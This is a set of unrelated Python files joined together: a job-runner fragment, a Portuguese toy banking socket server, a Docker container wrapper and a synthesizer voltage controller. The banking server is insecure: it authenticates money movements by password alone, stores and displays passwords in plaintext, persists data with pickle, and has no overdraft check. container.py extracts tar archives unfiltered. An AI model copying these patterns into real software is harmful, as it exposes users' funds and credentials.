                shutdown_object_store = True
            job_queue = DependentQueue(manager, EndOfQueue(), object_store)
            enqueue(dict_to_spec(spec), either_data(data), job_queue, level=level)
            processes = []
            output_paths = []
            for _ in range(number_of_workers):
                # mkstemp returns an open fd; close it, the worker reopens by path.
                fd, path = mkstemp(dir=temp_dir)
                os.close(fd)
                output_paths.append(path)
                p = Process(target=work_on, args=(job_queue, path, system_paths))
                p.start()
                processes.append(p)
            for p in processes:
                p.join()
            if output_path is None:
                fd, temp_path = mkstemp(dir=temp_dir)
                os.close(fd)
            else:
                temp_path = output_path
            merge_files(output_paths, temp_path)
            if output_path is None:
                return read_from_disk(temp_path)
            else:
                return None
    finally:
        if shutdown_object_store:
            object_store.shutdown()
        # Removes the per-worker files (and, when output_path is None, the
        # merged temp file as well).
        shutil.rmtree(temp_dir)
servidor.py
from socket import *
import threading
from classes import *
from datetime import *
from time import *
from pickle import *
from threading import *
from cripto import *
from ast import literal_eval
from tkinter import *

# CREATE THE SERVER SOCKET
server = socket(AF_INET, SOCK_STREAM)
host = gethostname()
porta = 20000
server.bind((host,porta))
server.listen()

# DESERIALIZE THE CLIENT LIST from disk (pickled list of `cliente` objects).
with open('clientes.pickle', 'rb') as f:
    clientes = load(f)

# MAIN PER-CONNECTION HANDLER: runs in its own thread for each accepted
# client and services a simple 1-byte-opcode protocol over the socket.
# NOTE(review): `clientes` is shared by all handler threads and the display
# thread with no locking -- concurrent mutation is racy; confirm acceptable.
def realiza_trabalho(client, addr):
    while 1:
        try:
            # Opcode: '1' login, '2' sign-up, '3' deposit, '4' withdraw,
            # '5' transfer. recv raises / returns '' on disconnect.
            verifica = client.recv(1024).decode('utf-8')
        except:
            client.close()
            print('O cliente se desconectou!')
            break

        # LOGIN: look up account+password; on match, send profile fields.
        if verifica == '1':
            a = 1
            ver_conta = str(client.recv(1024).decode('utf-8'))
            ver_senha = str(client.recv(1024).decode('utf-8'))
            for x in clientes:
                if x.getConta() == ver_conta and x.getSenha() == ver_senha:
                    client.send('ok'.encode('utf-8'))
                    # Tiny sleeps to keep successive sends from coalescing
                    # into one TCP segment on the client side.
                    sleep(0.001)
                    client.send(x.getNome().encode('utf-8'))
                    sleep(0.001)
                    client.send(str(x.getSaldo()).encode('utf-8'))
                    sleep(0.001)
                    client.send(x.getEmail().encode('utf-8'))
                    sleep(0.001)
                    client.send(x.getCpf().encode('utf-8'))
                    print('Requisição do cliente concluida.\n\n-------------------------------------------')
                    break
                # NOTE(review): `tamanho` is a module-level counter set in the
                # accept loop below; if a sign-up happened since the last
                # accept, len(clientes) != tamanho and the "not found" reply
                # may never be sent (client would hang). Verify.
                elif a == tamanho:
                    print(f'Ops! Cliente {ver_conta} não encontrado.\n\n-------------------------------------------')
                    client.send('n'.encode('utf-8'))
                a += 1

        # SIGN-UP: reject duplicate CPF, otherwise append and persist.
        elif verifica == '2':
            b = 0
            recv_cpf = client.recv(1024).decode('utf-8')
            for y in clientes:
                if y.getCpf() == recv_cpf:
                    client.send('n'.encode('utf-8'))
                    print('O cliente tentou cadastrar um CPF já cadastrado.\n\n-------------------------------------------')
                    break
            else:
                # for/else: runs only when no duplicate CPF was found.
                client.send('ok'.encode('utf-8'))
                recv_nome = client.recv(1024).decode('utf-8')
                recv_email = client.recv(1024).decode('utf-8')
                recv_senha = client.recv(1024).decode('utf-8')
                clientes.append(cliente(recv_nome, recv_cpf, recv_email, recv_senha))
                with open('clientes.pickle', 'wb') as f:
                    dump(clientes, f)
                # NOTE(review): b is still 0 here, so clientes[b-1] is
                # clientes[-1] -- the just-appended client. Works, but only by
                # accident of b never being incremented before this point.
                client.send(clientes[b-1].getConta().encode('utf-8'))
                print(f'Oba! O cliente {clientes[b-1].getConta()} foi cadastrado\n\n-------------------------------------------')
                b += 1

        # DEPOSIT: authenticate by password only, then add to balance.
        # NOTE(review): matching on password alone credits the FIRST client
        # with that password -- collisions deposit to the wrong account.
        elif verifica == '3':
            ver_senha = client.recv(1024).decode('utf-8')
            for c in clientes:
                if c.getSenha() == ver_senha:
                    valor_deposito = float(client.recv(1024).decode('utf-8'))
                    c.setSaldo(c.getSaldo() + valor_deposito)
                    with open('clientes.pickle', 'wb') as f:
                        dump(clientes, f)
                    print('Oba! Saldo de ' + c.getNome() + ' Atualizado para ' + str(c.getSaldo()) + '\n\n-------------------------------------------')
                    break

        # WITHDRAW: same password-only lookup; no balance/overdraft check.
        elif verifica == '4':
            ver_senha = client.recv(1024).decode('utf-8')
            for n in clientes:
                if n.getSenha() == ver_senha:
                    valor_saque = float(client.recv(1024).decode('utf-8'))
                    n.setSaldo(n.getSaldo() - valor_saque)
                    with open('clientes.pickle', 'wb') as f:
                        dump(clientes, f)
                    print('Oba! O Cliente Sacou R$ ' + str(valor_saque) + '\n\n-------------------------------------------')
                    break

        # TRANSFER: payload is an encrypted dict literal with keys
        # 'conta' (destination), 'conta2' (source) and 'valor'.
        elif verifica == '5':
            dados = client.recv(1024).decode('utf-8')
            dados = literal_eval(descriptografar(dados))
            for x in clientes:
                if x.getConta() == dados['conta']:
                    x.setSaldo(x.getSaldo() + float(dados['valor']))
                    for y in clientes:
                        if y.getConta() == dados['conta2']:
                            y.setSaldo(y.getSaldo() - float(dados['valor']))
                    client.send('ok'.encode('utf-8'))
                    break
                    # NOTE(review): dead code -- this dump is placed after the
                    # `break`, so a successful transfer is NEVER persisted to
                    # disk; the pickle only catches up on the next deposit/
                    # withdraw/sign-up. Likely a bug to confirm and fix.
                    with open('clientes.pickle', 'wb') as f:
                        dump(clientes, f)
                elif clientes.index(x) == (len(clientes) - 1):
                    # Destination not found after scanning the whole list.
                    client.send('n'.encode('utf-8'))


# GUI thread: shows the registered clients in a Tk window.
def mostrar():
    def line():
        # Horizontal separator row for the table.
        return('\n' + ('---------------------------------------' * 2) + '\n')
    lista = Tk()
    lista.title('Clientes cadastrados')
    peoples = Text(lista)
    peoples.insert(END, '|{:<50s}|{:<10s}|{:<14s}|'.format('Nome', 'Conta', 'Senha') + line())
    for x in clientes:
        peoples.insert(END, '|{:<50s}|{:<10s}|{:<14s}|'.format(x.getNome(), x.getConta(), x.getSenha()) + line())
    peoples.pack(side = TOP)
    lista.mainloop()

l = Thread(target = mostrar)
l.start()

# ACCEPT LOOP: one handler thread per incoming connection.
while 1:
    tamanho = len(clientes)
    print('\nClientes cadastrados: ' + str(tamanho))
    print('Aguardando conexão do cliente...' )
    client, addr = server.accept()
    data = datetime.now()
    print(f'Oba! Cliente {addr} conectado as {data.hour} : {data.minute}')
    print('-------------------------------------------')
    t = Thread(target = realiza_trabalho, args = (client, addr))
    t.start()
container.py
""" Representation of a generic Docker container """ import logging import tarfile import tempfile import threading import docker import requests from docker.errors import NotFound as DockerNetworkNotFound from samcli.lib.utils.retry import retry from .exceptions import ContainerNotStartableException from .utils import to_posix_path, find_free_port, NoFreePortsError LOG = logging.getLogger(__name__) class ContainerResponseException(Exception): """ Exception raised when unable to communicate with RAPID APIs on a running container. """ class Container: """ Represents an instance of a Docker container with a specific configuration. The container is not actually created or executed until the appropriate methods are called. Each container instance is uniquely identified by an ID that the Docker Daemon creates when the container is started. NOTE: This class does not download container images. It should be pulled separately and made available before creating a container with this class """ # This frame type value is coming directly from Docker Attach Stream API spec _STDOUT_FRAME_TYPE = 1 _STDERR_FRAME_TYPE = 2 RAPID_PORT_CONTAINER = "8080" URL = "http://localhost:{port}/2015-03-31/functions/{function_name}/invocations" # NOTE(sriram-mv): 100ms Connection Timeout for http requests talking to `aws-lambda-rie` HTTP APIs RAPID_CONNECTION_TIMEOUT = 0.1 def __init__( self, image, cmd, working_dir, host_dir, memory_limit_mb=None, exposed_ports=None, entrypoint=None, env_vars=None, docker_client=None, container_opts=None, additional_volumes=None, ): """ Initializes the class with given configuration. This does not automatically create or run the container. 
:param string image: Name of the Docker image to create container with :param string working_dir: Working directory for the container :param string host_dir: Directory in the host operating system that should be mounted to the ``working_dir`` on container :param list cmd: Command to pass to container :param int memory_limit_mb: Optional. Max limit of memory in MegaBytes this Lambda function can use. :param dict exposed_ports: Optional. Dict of ports to expose :param list entrypoint: Optional. Entry point process for the container. Defaults to the value in Dockerfile :param dict env_vars: Optional. Dict of environment variables to setup in the container """ self._image = image self._cmd = cmd self._working_dir = working_dir self._host_dir = host_dir self._exposed_ports = exposed_ports self._entrypoint = entrypoint self._env_vars = env_vars self._memory_limit_mb = memory_limit_mb self._network_id = None self._container_opts = container_opts self._additional_volumes = additional_volumes self._logs_thread = None # Use the given Docker client or create new one self.docker_client = docker_client or docker.from_env() # Runtime properties of the container. They won't have value until container is created or started self.id = None # aws-lambda-rie defaults to 8080 as the port, however that's a common port. A port is chosen by # selecting the first free port in a range that's not ephemeral. self._start_port_range = 5000 self._end_port_range = 9000 try: self.rapid_port_host = find_free_port(start=self._start_port_range, end=self._end_port_range) except NoFreePortsError as ex: raise ContainerNotStartableException(str(ex)) from ex def create(self): """ Calls Docker API to creates the Docker container instance. Creating the container does *not* run the container. 
Use ``start`` method to run the container :return string: ID of the created container :raise RuntimeError: If this method is called after a container already has been created """ if self.is_created(): raise RuntimeError("This container already exists. Cannot create again.") _volumes = {} if self._host_dir: LOG.info("Mounting %s as %s:ro,delegated inside runtime container", self._host_dir, self._working_dir) _volumes = { self._host_dir: { # Mount the host directory as "read only" directory inside container at working_dir # https://docs.docker.com/storage/bind-mounts # Mount the host directory as "read only" inside container "bind": self._working_dir, "mode": "ro,delegated", } } kwargs = { "command": self._cmd, "working_dir": self._working_dir, "volumes": _volumes, # We are not running an interactive shell here. "tty": False, # Set proxy configuration from global Docker config file "use_config_proxy": True, } if self._container_opts: kwargs.update(self._container_opts) if self._additional_volumes: kwargs["volumes"].update(self._additional_volumes) # Make sure all mounts are of posix path style. 
kwargs["volumes"] = {to_posix_path(host_dir): mount for host_dir, mount in kwargs["volumes"].items()} if self._env_vars: kwargs["environment"] = self._env_vars kwargs["ports"] = {self.RAPID_PORT_CONTAINER: ("127.0.0.1", self.rapid_port_host)} if self._exposed_ports: kwargs["ports"].update( {container_port: ("127.0.0.1", host_port) for container_port, host_port in self._exposed_ports.items()} ) if self._entrypoint: kwargs["entrypoint"] = self._entrypoint if self._memory_limit_mb: # Ex: 128m => 128MB kwargs["mem_limit"] = "{}m".format(self._memory_limit_mb) if self.network_id == "host": kwargs["network_mode"] = self.network_id real_container = self.docker_client.containers.create(self._image, **kwargs) self.id = real_container.id self._logs_thread = None if self.network_id and self.network_id != "host": try: network = self.docker_client.networks.get(self.network_id) network.connect(self.id) except DockerNetworkNotFound: # stop and delete the created container before raising the exception real_container.remove(force=True) raise return self.id def delete(self): """ Removes a container that was created earlier. """ if not self.is_created(): LOG.debug("Container was not created. Skipping deletion") return try: self.docker_client.containers.get(self.id).remove(force=True) # Remove a container, even if it is running except docker.errors.NotFound: # Container is already not there LOG.debug("Container with ID %s does not exist. Skipping deletion", self.id) except docker.errors.APIError as ex: msg = str(ex) removal_in_progress = ("removal of container" in msg) and ("is already in progress" in msg) # When removal is already started, Docker API will throw an exception # Skip such exceptions. if not removal_in_progress: raise ex self.id = None def start(self, input_data=None): """ Calls Docker API to start the container. The container must be created at the first place to run. 
It waits for the container to complete, fetches both stdout and stderr logs and returns through the given streams. Parameters ---------- input_data Optional. Input data sent to the container through container's stdin. """ if input_data: raise ValueError("Passing input through container's stdin is not supported") if not self.is_created(): raise RuntimeError("Container does not exist. Cannot start this container") # Get the underlying container instance from Docker API real_container = self.docker_client.containers.get(self.id) # Start the container real_container.start() @retry(exc=requests.exceptions.RequestException, exc_raise=ContainerResponseException) def wait_for_http_response(self, name, event, stdout): # TODO(sriram-mv): `aws-lambda-rie` is in a mode where the function_name is always "function" # NOTE(sriram-mv): There is a connection timeout set on the http call to `aws-lambda-rie`, however there is not # a read time out for the response received from the server. resp = requests.post( self.URL.format(port=self.rapid_port_host, function_name="function"), data=event, timeout=(self.RAPID_CONNECTION_TIMEOUT, None), ) stdout.write(resp.content) def wait_for_result(self, name, event, stdout, stderr): # NOTE(sriram-mv): Let logging happen in its own thread, so that a http request can be sent. # NOTE(sriram-mv): All logging is re-directed to stderr, so that only the lambda function return # will be written to stdout. 
# the log thread will not be closed until the container itself got deleted, # so as long as the container is still there, no need to start a new log thread if not self._logs_thread or not self._logs_thread.is_alive(): self._logs_thread = threading.Thread(target=self.wait_for_logs, args=(stderr, stderr), daemon=True) self._logs_thread.start() self.wait_for_http_response(name, event, stdout) def wait_for_logs(self, stdout=None, stderr=None): # Return instantly if we don't have to fetch any logs if not stdout and not stderr: return if not self.is_created(): raise RuntimeError("Container does not exist. Cannot get logs for this container") real_container = self.docker_client.containers.get(self.id) # Fetch both stdout and stderr streams from Docker as a single iterator. logs_itr = real_container.attach(stream=True, logs=True, demux=True) self._write_container_output(logs_itr, stdout=stdout, stderr=stderr) def copy(self, from_container_path, to_host_path): if not self.is_created(): raise RuntimeError("Container does not exist. 
Cannot get logs for this container") real_container = self.docker_client.containers.get(self.id) LOG.debug("Copying from container: %s -> %s", from_container_path, to_host_path) with tempfile.NamedTemporaryFile() as fp: tar_stream, _ = real_container.get_archive(from_container_path) for data in tar_stream: fp.write(data) # Seek the handle back to start of file for tarfile to use fp.seek(0) with tarfile.open(fileobj=fp, mode="r") as tar: tar.extractall(path=to_host_path) @staticmethod def _write_container_output(output_itr, stdout=None, stderr=None): """ Based on the data returned from the Container output, via the iterator, write it to the appropriate streams Parameters ---------- output_itr: Iterator Iterator returned by the Docker Attach command stdout: samcli.lib.utils.stream_writer.StreamWriter, optional Stream writer to write stdout data from Container into stderr: samcli.lib.utils.stream_writer.StreamWriter, optional Stream writer to write stderr data from the Container into """ # Iterator returns a tuple of (stdout, stderr) for stdout_data, stderr_data in output_itr: if stdout_data and stdout: stdout.write(stdout_data) if stderr_data and stderr: stderr.write(stderr_data) @property def network_id(self): """ Gets the ID of the network this container connects to :return string: ID of the network """ return self._network_id @network_id.setter def network_id(self, value): """ Set the ID of network that this container should connect to :param string value: Value of the network ID """ self._network_id = value @property def image(self): """ Returns the image used by this container :return string: Name of the container image """ return self._image def is_created(self): """ Checks if the real container exists? 
Returns ------- bool True if the container is created """ if self.id: try: self.docker_client.containers.get(self.id) return True except docker.errors.NotFound: return False return False def is_running(self): """ Checks if the real container status is running Returns ------- bool True if the container is running """ try: real_container = self.docker_client.containers.get(self.id) return real_container.status == "running" except docker.errors.NotFound: return False
polytron.py
import time
import sys
import os
import logging
import threading
import random
import math
import json
from subprocess import Popen, PIPE, STDOUT
from signal import signal, SIGINT

# Guards both the I2C voltage writes and the shared voice-allocation maps.
sem = threading.Semaphore()

import click
import numpy as np
from loguru import logger
import mido
from mido.ports import MultiPort
import smbus
import termplotlib as tpl

logger.remove()
logger.add(sys.stderr, level="INFO")

# Get I2C bus
bus = smbus.SMBus(1)

VOLTAGE_VDD = 5.0
VOLTAGE_RAIL = 5.0
# DAC channel numbers for each voice's pitch and filter-cutoff CV.
CHANNEL_PITCH = [32, 34, 36, 38]
CHANNEL_CUTOFF = [33, 35, 37, 39]
CHANNEL_NAMES = {}
for _, v in enumerate(CHANNEL_CUTOFF):
    CHANNEL_NAMES[v] = "cutoff {}".format(v)
for _, v in enumerate(CHANNEL_PITCH):
    CHANNEL_NAMES[v] = "pitch {}".format(v)


def freq2voltage(freq,fitting):
    # Invert the measured log-linear voltage->frequency curve:
    # volts = m*log(freq) + b, with fitting = (m, b).
    return fitting[0] * math.log(freq) + fitting[1]


def midi2freq(midi_number):
    a = 440  # frequency of A (common value is 440Hz)
    return (a / 32) * (2 ** ((midi_number - 9) / 12))


def note2voltage(note,fitting):
    # MIDI note -> frequency -> control voltage via the per-voice fit.
    return freq2voltage(midi2freq(note),fitting)


def midi2str(midi_number, sharp=True):
    """
    Given a MIDI pitch number, returns its note string name (e.g. "C3"),
    appending a +/- percent suffix when the pitch falls between semitones.
    """
    MIDI_A4 = 69
    num = midi_number - (MIDI_A4 - 4 * 12 - 9)
    note = (num + 0.5) % 12 - 0.5
    rnote = int(round(note))
    error = note - rnote
    octave = str(int(round((num - note) / 12.0)))
    if sharp:
        names = ["C", "C#", "D", "D#", "E", "F", "F#", "G", "G#", "A", "A#", "B"]
    else:
        names = ["C", "Db", "D", "Eb", "E", "F", "Gb", "G", "Ab", "A", "Bb", "B"]
    names = names[rnote] + octave
    if abs(error) < 1e-4:
        return names
    else:
        err_sig = "+" if error > 0 else "-"
        err_str = err_sig + str(round(100 * abs(error), 2)) + "%"
        return names + err_str


def set_voltage(channel, voltage):
    """Write a 16-bit value for `voltage` (0..VOLTAGE_VDD) to a DAC channel."""
    sem.acquire()
    n = int(voltage / VOLTAGE_VDD * 65535)
    lo = n & 0x00FF
    hi = n >> 8
    data = [hi, lo]
    sem.release()
    # NOTE(review): the semaphore is released BEFORE the I2C write below, so
    # concurrent bus writes are not actually serialized -- confirm intent.
    # 0x56 determined by sudo i2cdetect -y 1
    bus.write_i2c_block_data(0x56, channel, data)
    logger.debug("{} set to {:2.2f}", channel, voltage)


#
# frequency analysis
#
def get_frequency_analysis():
    """Record 1s of audio and return its median detected pitch in Hz."""
    cmd = "arecord -d 1 -f cd -t wav -D sysdefault:CARD=2 /tmp/1s.wav"
    p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
    output = p.stdout.read()
    if b"Recording WAVE" not in output:
        # NOTE(review): raising a bytes object is a TypeError in Python 3;
        # this should wrap `output` in an Exception.
        raise output
    # cmd = "sox /tmp/1s.wav -n stat -freq"
    cmd = "aubio pitch -m schmitt -H 1024 /tmp/1s.wav"
    p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
    output = p.stdout.read()
    with open("/tmp/1s.dat", "wb") as f:
        f.write(output)
    freq = analyze_aubio()
    return freq


def analyze_aubio():
    """Parse aubio's "<time> <freq>" output; return the median frequency
    above 50 Hz (skipping the first lines of attack), or -1 if none."""
    gathered_freqs = []
    with open("/tmp/1s.dat", "r") as f:
        linenum = 0
        for line in f:
            linenum += 1
            if linenum < 10:
                continue
            s = line.split()
            if len(s) != 2:
                continue
            freq = float(s[1])
            if freq > 50:
                gathered_freqs.append(freq)
    if len(gathered_freqs) == 0:
        return -1
    avg = np.median(gathered_freqs)
    logger.debug("got frequency {}",avg)
    return avg


#
# plotting
#
def plot_points(voltage_to_frequency):
    """Render a terminal scatter plot of frequency vs voltage."""
    x = []
    y0 = []
    for k in voltage_to_frequency:
        x.append(float(k))
        y0.append(voltage_to_frequency[k])
    fig = tpl.figure()
    print("\n")
    fig.plot(
        x,
        y0,
        plot_command="plot '-' w points",
        width=50,
        height=20,
        xlabel="voltage (v)",
        title="frequency (hz) vs voltage",
    )
    fig.show()
    print("\n")


class Envelope:
    """
    Some monotrons may share an envelope.
    """

    # Envelope time/voltage scaling constants.
    max_seconds = 10
    max_voltage = VOLTAGE_RAIL
    min_voltage = 0.0
    steps = 50  # number of increments per A/D/R ramp

    def __init__(self, voice):
        self.voice = voice                 # index into CHANNEL_CUTOFF
        self.last_played = time.time()
        self.is_attacking = False          # set while the A/D ramp runs
        self.is_releasing = False          # set while the R ramp runs
        self.a = 0.3
        self.d = 0.1
        self.s = 1.0
        self.r = 0.5
        self.peak = 1.0
        self.value = 0                     # current cutoff voltage
        self.set_adsr(self.peak,self.a,self.d,self.s,self.r)

    def _increment_cutoff(self, val):
        # Step the cutoff CV, clamped to [min_voltage, max_voltage].
        self.value = self.value + val
        if self.value > self.max_voltage:
            self.value = self.max_voltage
        if self.value < self.min_voltage:
            self.value = self.min_voltage
        set_voltage(CHANNEL_CUTOFF[self.voice], self.value)

    def set_adsr(self, peak, a, d, s, r):
        # all input values are between 0 and 1
        self.peak = peak * (self.max_voltage - self.min_voltage) + self.min_voltage
        self.a = a * self.max_seconds
        self.d = d * self.max_seconds
        self.s = s * (self.max_voltage - self.min_voltage) + self.min_voltage
        self.r = r * self.max_seconds

    def on(self):
        # Fully open the filter (bypass the envelope).
        set_voltage(CHANNEL_CUTOFF[self.voice], VOLTAGE_RAIL)

    def off(self):
        # Fully close the filter.
        set_voltage(CHANNEL_CUTOFF[self.voice], 0)

    def attack(self, voice, velocity):
        """Start the attack/decay ramp on a background thread."""
        if self.is_attacking:
            return
        self.is_attacking = True
        self.is_releasing = False
        x = threading.Thread(target=self._attack, args=(voice, velocity,))
        x.start()

    def _attack(self, voice, velocity):
        # attack
        logger.debug("attacking for {}s", self.a)
        step = (self.peak*velocity - self.value) / self.steps
        a = self.a - 0.2*(velocity)*self.max_seconds  # shorten attack if played harder
        if a < 0:
            a = 0.1
        for i in range(self.steps):
            if not self.is_attacking:
                # A release (or new note) cancelled this ramp.
                return
            self._increment_cutoff(step)
            time.sleep(a / self.steps)
        set_voltage(CHANNEL_CUTOFF[self.voice], self.peak*velocity )
        # decay
        logger.debug("decaying for {}s", self.d)
        s = self.s*velocity
        step = (s - self.value) / self.steps
        for i in range(self.steps):
            if not self.is_attacking:
                return
            self._increment_cutoff(step)
            time.sleep(self.d / self.steps)
        set_voltage(CHANNEL_CUTOFF[self.voice], s)
        self.is_attacking = False

    def release(self, voice):
        """Start the release ramp on a background thread."""
        if self.is_releasing:
            return
        self.is_releasing = True
        self.is_attacking = False
        x = threading.Thread(target=self._release, args=(voice,))
        x.start()

    def _release(self, voice):
        # release
        logger.debug("releasing for {}s", self.r)
        step = (self.min_voltage - self.value) / self.steps
        for i in range(self.steps):
            if not self.is_releasing:
                return
            self._increment_cutoff(step)
            time.sleep(self.r / self.steps)
        set_voltage(CHANNEL_CUTOFF[self.voice], self.min_voltage)
        self.is_releasing = False


class Voices:
    """
    Voices keeps track of the tuning and availability of each voice.
    There should be one voice object passed into each of the keyboards.
    Voices are indexed starting at 0.
    """

    def __init__(self, max_voices, voice_envelope_mapping=[]):
        self.max_voices = max_voices
        self.voices = [0] * max_voices        # last-acquired timestamp per voice
        self.notes_used = {}                  # midi note -> voice index
        self.voices_used = {}                 # voice index -> midi note
        self.last_note = {}                   # voice index -> previous note (for legato)
        # NOTE(review): [{}] * n creates n references to the SAME dict.
        self.tuning = [{}] * max_voices
        self.envelope = []
        self.portamento=[0]*max_voices        # glide time (s) per voice
        self.mbs = []  # stores curve fitting for frequencies
        # Map voice index -> envelope index (defaults to identity).
        self.v2e = voice_envelope_mapping
        if len(self.v2e) != self.max_voices:
            self.v2e = list(range(self.max_voices))
        for i in range(self.max_voices):
            self.envelope.append(Envelope(self.v2e[i]))

    def set_portamento(self,voice,portamento):
        self.portamento[voice]=portamento

    def set_adsr(self, voice, a, d, s, r):
        # NOTE(review): two bugs -- `v2e` should be `self.v2e`, and
        # Envelope.set_adsr takes (peak, a, d, s, r), so this call is one
        # argument short. As written this raises NameError/TypeError.
        self.envelope[v2e[voice]].set_adsr(a, d, s, r)

    def tune_specific(self, specific_voice=-1):
        """Fine-tune each voice: for MIDI notes 60-69, sweep voltages around
        the coarse fit's prediction, refit locally, and save note->voltage
        and voltage->frequency maps to JSON."""
        for voice in range(self.max_voices):
            if specific_voice > 0 and specific_voice != voice:
                continue
            self.off()
            note_to_voltage = {}
            voltage_to_frequency2 = {}
            previous_freq = 0
            for midinote in range(60,70):
                target_freq = midi2freq(midinote)
                mid_voltage = note2voltage(midinote,self.mbs[voice])
                logger.info("target: {:2.2f}",target_freq)
                logger.info("current voltage: {:2.3f}",mid_voltage)
                vs = []
                fs = []
                # Sample the real oscillator in a small window around the
                # predicted voltage, then fit voltage as linear in frequency.
                for voltage in np.arange(mid_voltage-0.006,mid_voltage+0.012,0.002):
                    self.solo_voltage(voice,voltage)
                    time.sleep(0.5)
                    freq = get_frequency_analysis()
                    print("{:2.3f} {:2.2f}".format(voltage,freq))
                    vs.append(voltage)
                    fs.append(freq)
                mb = np.polyfit(fs, vs, 1)
                good_voltage = mb[0]*target_freq+mb[1]
                logger.info("new voltage: {}",good_voltage)
                voltage_to_frequency2[good_voltage] = target_freq
                note_to_voltage[midinote] = good_voltage
            with open("voltage_to_frequency2{}.json".format(voice), "w") as f:
                f.write(json.dumps(voltage_to_frequency2))
            with open("note_to_voltage{}.json".format(voice), "w") as f:
                f.write(json.dumps(note_to_voltage))
        self.off()
        self.load_tuning()

    def tune(self,specific_voice=-1):
        """Coarse-tune each voice: sweep 2.10-2.95 V, record the measured
        frequency at each step, and save the curve to JSON."""
        for voice in range(self.max_voices):
            if specific_voice > 0 and specific_voice != voice:
                continue
            self.off()
            voltage_to_frequency = {}
            previous_freq = 0
            for voltage in range(210,300,5):
                voltage = float(voltage)/100.0
                self.solo_voltage(voice,voltage)
                time.sleep(1)
                freq = get_frequency_analysis()
                # Discard non-monotonic readings (pitch tracker glitches).
                if freq < previous_freq:
                    continue
                voltage_to_frequency[voltage]=freq
                previous_freq = freq
                os.system("clear")
                print("voice {}".format(voice))
                plot_points(voltage_to_frequency)
                logger.debug("voltage -> freq: {} -> {}",voltage,freq)
            with open("voltage_to_frequency{}.json".format(voice), "w") as f:
                f.write(json.dumps(voltage_to_frequency))
        self.off()
        self.load_tuning()

    def load_tuning(self):
        """Load saved tuning JSON for each voice and fit volts = m*log(freq)+b."""
        self.mbs = []
        # NOTE(review): [{}] * n aliases one dict across all voices; the
        # json.load below rebinds elements, so it happens to work here.
        self.note_to_voltage = [{}]*self.max_voices
        for voice in range(self.max_voices):
            try:
                self.note_to_voltage[voice] = json.load(open("note_to_voltage{}.json".format(voice), "rb"))
            except:
                # Fine-tuning file is optional; fall back to the curve fit.
                pass
            voltage_to_frequency = json.load(open("voltage_to_frequency{}.json".format(voice), "rb"))
            x = []
            y = []
            y0 = []
            for k in voltage_to_frequency:
                x.append(float(k))
                y0.append(voltage_to_frequency[k])
                y.append(math.log(voltage_to_frequency[k]))
            mb = np.polyfit(y, x, 1)
            fig = tpl.figure()
            print("\n")
            fig.plot(
                x,
                y0,
                plot_command="plot '-' w points",
                width=60,
                height=22,
                xlabel="voltage (v)",
                title="frequency (hz) vs voltage",
                label="volts = {:2.2f}*log(freq){:+2.2f}  ".format(mb[0], mb[1]),
            )
            fig.show()
            print("\n")
            time.sleep(0.1)
            # Clamp implausible fits to empirically sane defaults.
            if mb[0] < 0.5:
                mb[0] = 0.64
            if mb[1] > 1:
                mb[1] = -1
            self.mbs.append(mb)

    def solo_voltage(self,voice,voltage):
        # Silence every voice, open only `voice`, and drive its pitch CV.
        for i in range(self.max_voices):
            self.envelope[self.v2e[i]].off()
        self.envelope[self.v2e[voice]].on()
        set_voltage(CHANNEL_PITCH[voice],voltage)

    def solo(self, voice):
        """
        Turns up cutoff for voice
        Removes other voices
        """
        # NOTE(review): CHANNEL_GATE, GATE_ON and GATE_OFF are not defined
        # anywhere in this module -- calling solo() raises NameError.
        for i in range(self.max_voices):
            if i == voice:
                set_voltage(CHANNEL_GATE[voice], GATE_ON)
            else:
                set_voltage(CHANNEL_GATE[voice], GATE_OFF)
                self.envelope[self.v2e[i]].off()
        self.envelope[self.v2e[voice]].on()

    def off(self):
        # Zero all pitch and cutoff CVs.
        for i in range(self.max_voices):
            set_voltage(CHANNEL_CUTOFF[i],0)
            set_voltage(CHANNEL_PITCH[i],0)

    def acquire_voice(self):
        """Return a free voice index, or steal the least-recently-used one."""
        for voice in range(self.max_voices):
            if voice not in self.voices_used:
                return voice
        # find oldest voice
        oldest = 0
        voice = 1
        for i, v in enumerate(self.voices):
            if time.time() - v > oldest:
                oldest = time.time() - v
                voice = i
        return voice

    def play(self, note, velocity):
        """Allocate a voice for `note` and start pitch CV + envelope attack."""
        if note in self.notes_used:
            return
        sem.acquire()
        voice = self.acquire_voice()
        self.voices[voice] = time.time()
        # remove voice if it was acquired
        if voice in self.voices_used:
            note_to_remove = self.voices_used[voice]
            logger.debug("removing voice {} playing {}", voice, note_to_remove)
            del self.voices_used[voice]
            del self.notes_used[note_to_remove]
        delete_note = []  # NOTE(review): unused leftover
        self.notes_used[note] = voice
        self.voices_used[voice] = note
        sem.release()
        logger.info("playing {} ({:2.1f}) on voice {}", note, midi2freq(note), voice)
        # do legato
        if voice in self.last_note and self.portamento[voice] > 0:
            x = threading.Thread(target=self.play_legato, args=(voice,self.last_note[voice],note,))
            x.start()
        else:
            # x = threading.Thread(target=self.play_detuned, args=(voice,note,))
            # x.start()
            self._play(voice,note)
        self.envelope[self.v2e[voice]].attack(voice,velocity)
        self.last_note[voice]=note

    def _play(self,voice,note,voltage=0):
        # Prefer the fine-tuned per-note voltage map; fall back to curve fit.
        if voltage == 0:
            voltage = note2voltage(note,self.mbs[voice])
            if str(note) in self.note_to_voltage[voice]:
                logger.info("got voltage from note map")
                voltage = self.note_to_voltage[voice][str(note)]
            else:
                logger.info("not in map")
                print(self.note_to_voltage)
        set_voltage(CHANNEL_PITCH[voice], voltage)

    def play_detuned(self,voice,note):
        # Wobble pitch +/-2% around the note for as long as it is held.
        self._play(voice,note)
        freq = midi2freq(note)
        min_freq = freq*(1-0.02)
        max_freq = freq*(1+0.02)
        for i in range(100):
            if voice not in self.voices_used or self.voices_used[voice] != note:
                # note is canceled
                return
            self._play(voice,note,voltage=freq2voltage(random.random()*(max_freq-min_freq)+min_freq,self.mbs[voice]))
            time.sleep(0.05)

    def play_legato(self,voice,note1,note2):
        # Glide linearly in frequency from note1 to note2 over the voice's
        # portamento time, aborting if the note is released mid-glide.
        set_voltage(CHANNEL_PITCH[voice], note2voltage(note1,self.mbs[voice]))
        freq1 = midi2freq(note1)
        freq2 = midi2freq(note2)
        steps = int(self.portamento[voice]/0.025)
        for i in range(steps):
            if voice not in self.voices_used or self.voices_used[voice] != note2:
                # note is canceled
                return
            time.sleep(0.025)
